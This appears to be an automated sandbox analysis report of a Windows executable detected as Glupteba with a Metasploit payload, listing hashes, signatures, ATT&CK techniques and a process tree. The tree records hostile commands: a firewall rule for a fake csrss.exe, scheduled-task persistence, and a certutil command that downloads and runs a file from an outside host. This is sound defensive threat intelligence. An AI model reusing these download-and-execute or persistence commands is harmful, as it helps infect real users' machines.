Analysis

  • max time kernel
    152s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    14-07-2022 06:03

General

  • Target

    479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe

  • Size

    3.7MB

  • MD5

    8e52e316baff9c06e2e8354c99d6c10d

  • SHA1

    8c00dab5d2e609cbe3e5f39146fc1b76234da27a

  • SHA256

    479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f

  • SHA512

    cf2b6794b46ad9cfe7bf39434c31088521214df84f17b5521878a9fce3ecce9a8cfea31bc3f2ed2b89d7b3957249cf462a98d3b3c0e4921eafc2ec9185b2619c

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 7 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe
    "C:\Users\Admin\AppData\Local\Temp\479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2272
    • C:\Users\Admin\AppData\Local\Temp\479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe
      "C:\Users\Admin\AppData\Local\Temp\479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4232
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2184
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:4128
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3516
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:4996
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:536
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:2064
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:1780
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 776
        3⤵
        • Program crash
        PID:4548
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 700
      2⤵
      • Program crash
      PID:4448
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1964
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2272 -ip 2272
    1⤵
      PID:4432
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 4232 -ip 4232
      1⤵
        PID:1284

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.7MB

        MD5

        8e52e316baff9c06e2e8354c99d6c10d

        SHA1

        8c00dab5d2e609cbe3e5f39146fc1b76234da27a

        SHA256

        479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f

        SHA512

        cf2b6794b46ad9cfe7bf39434c31088521214df84f17b5521878a9fce3ecce9a8cfea31bc3f2ed2b89d7b3957249cf462a98d3b3c0e4921eafc2ec9185b2619c

      • C:\Windows\rss\csrss.exe
        Filesize

        3.7MB

        MD5

        8e52e316baff9c06e2e8354c99d6c10d

        SHA1

        8c00dab5d2e609cbe3e5f39146fc1b76234da27a

        SHA256

        479ffc21040b0554a5345772a9472d267ff35dd225f5ba87f73109f97b93a39f

        SHA512

        cf2b6794b46ad9cfe7bf39434c31088521214df84f17b5521878a9fce3ecce9a8cfea31bc3f2ed2b89d7b3957249cf462a98d3b3c0e4921eafc2ec9185b2619c

      • memory/536-146-0x0000000000000000-mapping.dmp
      • memory/1780-150-0x0000000000000000-mapping.dmp
      • memory/2064-147-0x0000000000000000-mapping.dmp
      • memory/2184-135-0x0000000000000000-mapping.dmp
      • memory/2272-130-0x00000000011CF000-0x0000000001577000-memory.dmp
        Filesize

        3.7MB

      • memory/2272-131-0x0000000001580000-0x0000000001D84000-memory.dmp
        Filesize

        8.0MB

      • memory/2272-132-0x0000000000400000-0x0000000000C1D000-memory.dmp
        Filesize

        8.1MB

      • memory/2272-134-0x0000000000400000-0x0000000000C1D000-memory.dmp
        Filesize

        8.1MB

      • memory/3516-143-0x0000000001600000-0x00000000019A8000-memory.dmp
        Filesize

        3.7MB

      • memory/3516-144-0x0000000000400000-0x0000000000C1D000-memory.dmp
        Filesize

        8.1MB

      • memory/3516-139-0x0000000000000000-mapping.dmp
      • memory/3516-149-0x0000000000400000-0x0000000000C1D000-memory.dmp
        Filesize

        8.1MB

      • memory/4128-136-0x0000000000000000-mapping.dmp
      • memory/4232-142-0x0000000000400000-0x0000000000C1D000-memory.dmp
        Filesize

        8.1MB

      • memory/4232-137-0x0000000001189000-0x0000000001531000-memory.dmp
        Filesize

        3.7MB

      • memory/4232-133-0x0000000000000000-mapping.dmp
      • memory/4232-138-0x0000000000400000-0x0000000000C1D000-memory.dmp
        Filesize

        8.1MB

      • memory/4996-145-0x0000000000000000-mapping.dmp